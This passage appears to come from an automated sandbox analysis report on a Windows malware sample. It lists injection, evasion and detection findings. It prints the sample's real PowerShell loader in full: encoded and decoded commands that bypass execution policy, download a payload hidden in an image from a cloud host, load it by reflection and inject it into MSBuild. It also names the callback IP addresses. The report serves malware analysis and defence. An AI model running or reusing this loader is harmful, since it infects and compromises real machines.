                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138CB7E mov eax, dword ptr fs:[00000030h]9_2_0138CB7E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464B00 mov eax, dword ptr fs:[00000030h]9_2_01464B00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140EB1D mov eax, dword ptr fs:[00000030h]9_2_0140EB1D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01388B50 mov eax, dword ptr fs:[00000030h]9_2_01388B50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01458B28 mov eax, dword ptr fs:[00000030h]9_2_01458B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01458B28 mov eax, dword ptr fs:[00000030h]9_2_01458B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0BBE mov eax, dword ptr fs:[00000030h]9_2_013A0BBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0BBE mov eax, dword ptr fs:[00000030h]9_2_013A0BBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143EBD0 mov eax, dword ptr fs:[00000030h]9_2_0143EBD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141CBF0 mov eax, dword ptr fs:[00000030h]9_2_0141CBF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BEBFC mov eax, dword ptr fs:[00000030h]9_2_013BEBFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398BF0 mov eax, dword ptr fs:[00000030h]9_2_01398BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398BF0 mov eax, dword ptr fs:[00000030h]9_2_01398BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398BF0 mov eax, dword ptr fs:[00000030h]9_2_01398BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B0BCB mov eax, dword ptr fs:[00000030h]9_2_013B0BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B0BCB mov eax, dword ptr fs:[00000030h]9_2_013B0BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B0BCB mov eax, dword ptr fs:[00000030h]9_2_013B0BCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01390BCD mov eax, dword ptr fs:[00000030h]9_2_01390BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01390BCD mov eax, dword ptr fs:[00000030h]9_2_01390BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01390BCD mov eax, dword ptr fs:[00000030h]9_2_01390BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01444BB0 mov eax, dword ptr fs:[00000030h]9_2_01444BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01444BB0 mov eax, dword ptr fs:[00000030h]9_2_01444BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B4A35 mov eax, dword ptr fs:[00000030h]9_2_013B4A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013B4A35 mov eax, dword ptr fs:[00000030h]9_2_013B4A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BEA2E mov eax, dword ptr fs:[00000030h]9_2_013BEA2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CCA24 mov eax, dword ptr fs:[00000030h]9_2_013CCA24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143EA60 mov eax, dword ptr fs:[00000030h]9_2_0143EA60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140CA72 mov eax, dword ptr fs:[00000030h]9_2_0140CA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140CA72 mov eax, dword ptr fs:[00000030h]9_2_0140CA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141CA11 mov eax, dword ptr fs:[00000030h]9_2_0141CA11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CCA6F mov eax, dword ptr fs:[00000030h]9_2_013CCA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CCA6F mov eax, dword ptr fs:[00000030h]9_2_013CCA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013CCA6F mov eax, dword ptr fs:[00000030h]9_2_013CCA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0A5B mov eax, dword ptr fs:[00000030h]9_2_013A0A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013A0A5B mov eax, dword ptr fs:[00000030h]9_2_013A0A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396A50 mov eax, dword ptr fs:[00000030h]9_2_01396A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396A50 mov eax, dword ptr fs:[00000030h]9_2_01396A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396A50 mov eax, dword ptr fs:[00000030h]9_2_01396A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396A50 mov eax, dword ptr fs:[00000030h]9_2_01396A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396A50 mov eax, dword ptr fs:[00000030h]9_2_01396A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396A50 mov eax, dword ptr fs:[00000030h]9_2_01396A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396A50 mov eax, dword ptr fs:[00000030h]9_2_01396A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398AA0 mov eax, dword ptr fs:[00000030h]9_2_01398AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01398AA0 mov eax, dword ptr fs:[00000030h]9_2_01398AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013E6AA4 mov eax, dword ptr fs:[00000030h]9_2_013E6AA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C8A90 mov edx, dword ptr fs:[00000030h]9_2_013C8A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139EA80 mov eax, dword ptr fs:[00000030h]9_2_0139EA80

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 192.186.57.30 80Jump to behavior
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_7616.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEw
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeNtSetContextThread: Indirect: 0x5193619Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeNtSuspendThread: Indirect: 0x5193939Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeNtQueueApcThread: Indirect: 0x518F39AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeNtClose: Indirect: 0x518F425
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeNtResumeThread: Indirect: 0x5193C59Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Windows\System32\wscript.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: NULL target: C:\Windows\System32\wscript.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Windows\System32\wscript.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Windows\System32\wscript.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread register set: target process: 7296Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeThread register set: target process: 7296Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeThread register set: target process: 1908Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A91008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\ostaxa.jsJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $zooiatrologia = 'aqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsaaqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsajabtageazabyagkazwbhagwazqb0aguaiaa9acaajwboahqadabwahmaogavac8acgblahmalgbjagwabwb1agqaaqbuageacgb5ac4aywbvag0alwbkahkadabmagwadaa2adeabgavagkabqbhagcazqavahuacabsag8ayqbkac8adgaxadcamwazadeamwa0adkanaa3ac8aygbragwacab5ahmazqb5aguadqb0adqaaqbtahaadwa1adaabgaxac4aagbwagcaiaanadsajabyaguabab